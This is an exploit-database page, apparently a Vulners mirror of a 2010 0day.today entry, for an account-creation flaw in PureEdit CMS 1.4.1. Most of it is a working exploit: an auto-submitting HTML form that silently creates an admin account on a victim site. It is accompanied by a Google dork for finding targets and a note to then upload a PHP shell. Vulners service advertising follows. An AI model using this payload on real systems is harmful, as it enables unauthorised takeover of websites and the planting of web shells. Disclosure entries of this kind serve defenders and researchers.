Lucene search
K

PureEdit 1.4.1 Account Creation Vulnerability

🗓️ 23 Aug 2010 00:00:00Reported by pimpimType 
zdt
 zdt
🔗 0day.today👁 24 Views

PureEdit 1.4.1 account creation vulnerability allows admin account creation, and PHP shell uploa

Code
=============================================
PureEdit 1.4.1 Account Creation Vulnerability
=============================================

# Exploit Title: PureEdit 1.4.1 Account Creation Vulnerability
# Date: 22/08/2010
# Author: pimpim
# Software Link: http://www.pureedit.com/download/index.php?version=1.4.1
# Version: 1.4.1
# Category:: webapps
# Google dork: intext:"Powered by PureEdit"
# Tested on: Linux
#
#The PureEdit CMS has got a design flaw that allows anybody to create admin accounts.
#Note: The default admin directory is called pe-admin
#Note2: When you have created your account, then you can go to 
#[admin]/centers/uploads.center.php and upload a php-shell

<html>
	<body>
		<form action="http://[victim]/[admin-directory]/centers/accounts.center.php" method="POST">
			<input type="hidden" name="id" value="0"/>
			<input type="hidden" name="title" value="hack"/>
			<input type="hidden" name="email" value="[email protected]"/>
			<input type="hidden" name="website" value="http://www.inj3ct0r.com"/>
			<input type="hidden" name="username" value="hacker"/>
			<input type="hidden" name="password" value="passwd"/>
		</form>
		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>



#  0day.today [2018-04-13]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Aug 2010 00:00Current
7.1High risk
Vulners AI Score7.1
24